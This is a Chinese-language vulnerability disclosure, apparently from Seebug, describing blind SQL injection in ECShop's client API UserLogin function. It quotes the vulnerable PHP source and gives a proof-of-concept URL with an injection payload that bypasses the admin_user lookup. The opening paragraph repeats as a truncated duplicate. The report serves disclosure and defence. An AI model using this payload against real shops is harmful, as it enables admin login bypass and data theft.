### 简要描述: 该漏洞已经过本人测试存在。在服务器关闭魔法引号的情况下可以盲注,不受ECShop内核过滤影响。这次不坑爹了 问题文件在/api/client/api.php 利用方法为POST ### 详细说明: /api/client/api.php 第7行 ``` dispatch($_POST); ``` /api/client/includes/lib_api.php 6 -10 行 ``` $func_arr = array('GetDomain', 'UserLogin', 'AddCategory', 'AddBrand', 'AddGoods', 'GetCategory', 'GetBrand', 'GetGoods', 'DeleteBrand', 'DeleteCategory', 'DeleteGoods', 'EditBrand', 'EditCategory', 'EditGoods'); if(in_array($post['Action'], $func_arr) && function_exists('API_'.$post['Action'])) { return call_user_func('API_'.$post['Action'], $post); } ``` 当$_POST['Action'] == 'UserLogin'的时候调用 /api/client/includes/lib_api.php 246 行 ``` function API_UserLogin($post) { $post['username'] = isset($post['UserId']) ? trim($post['UserId']) : ''; $post['password'] = isset($post['Password']) ? strtolower(trim($post['Password'])) : ''; /* 检查密码是否正确 */ $sql = "SELECT user_id, user_name, password, action_list, last_login". " FROM " . $GLOBALS['ecs']->table('admin_user') . " WHERE user_name = '"...
### 简要描述: 该漏洞已经过本人测试存在。在服务器关闭魔法引号的情况下可以盲注,不受ECShop内核过滤影响。这次不坑爹了 问题文件在/api/client/api.php 利用方法为POST ### 详细说明: /api/client/api.php 第7行 ``` dispatch($_POST); ``` /api/client/includes/lib_api.php 6 -10 行 ``` $func_arr = array('GetDomain', 'UserLogin', 'AddCategory', 'AddBrand', 'AddGoods', 'GetCategory', 'GetBrand', 'GetGoods', 'DeleteBrand', 'DeleteCategory', 'DeleteGoods', 'EditBrand', 'EditCategory', 'EditGoods'); if(in_array($post['Action'], $func_arr) && function_exists('API_'.$post['Action'])) { return call_user_func('API_'.$post['Action'], $post); } ``` 当$_POST['Action'] == 'UserLogin'的时候调用 /api/client/includes/lib_api.php 246 行 ``` function API_UserLogin($post) { $post['username'] = isset($post['UserId']) ? trim($post['UserId']) : ''; $post['password'] = isset($post['Password']) ? strtolower(trim($post['Password'])) : ''; /* 检查密码是否正确 */ $sql = "SELECT user_id, user_name, password, action_list, last_login". " FROM " . $GLOBALS['ecs']->table('admin_user') . " WHERE user_name = '" . $post['username']. "'"; $row = $GLOBALS['db']->getRow($sql); if ($row) { if ($row['password'] != $post['password']) { client_show_message(103); } require_once(ROOT_PATH. ADMIN_PATH . '/includes/lib_main.php'); // 登录成功 set_admin_session($row['user_id'], $row['user_name'], $row['action_list'], $row['last_login']); // 更新最后登录时间和IP $GLOBALS['db']->query("UPDATE " .$GLOBALS['ecs']->table('admin_user'). " SET last_login='" . gmtime() . "', last_ip='" . real_ip() . "'". " WHERE user_id='$_SESSION[admin_id]'"); client_show_message(100, true, VERSION, 0, true, EC_CHARSET); } ``` 其中USERID未经过滤且不受内核过滤影响,造成盲注漏洞 ### 漏洞证明: http://localhost/ecshop/api/client/api.php?Action=UserLogin&UserId=%27%20or%20user_id=1%23 注:为方便测试,我把代码里的POST方法改成GET,为了方便显示注入成功,我在执行SQL后插入适当代码使结果显示出来。真实环境并不显示如图结果 [<img src="https://images.seebug.org/upload/201110/101153596d53bf5dc4d5ef381db7acf5fcb64e4c.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201110/101153596d53bf5dc4d5ef381db7acf5fcb64e4c.png)
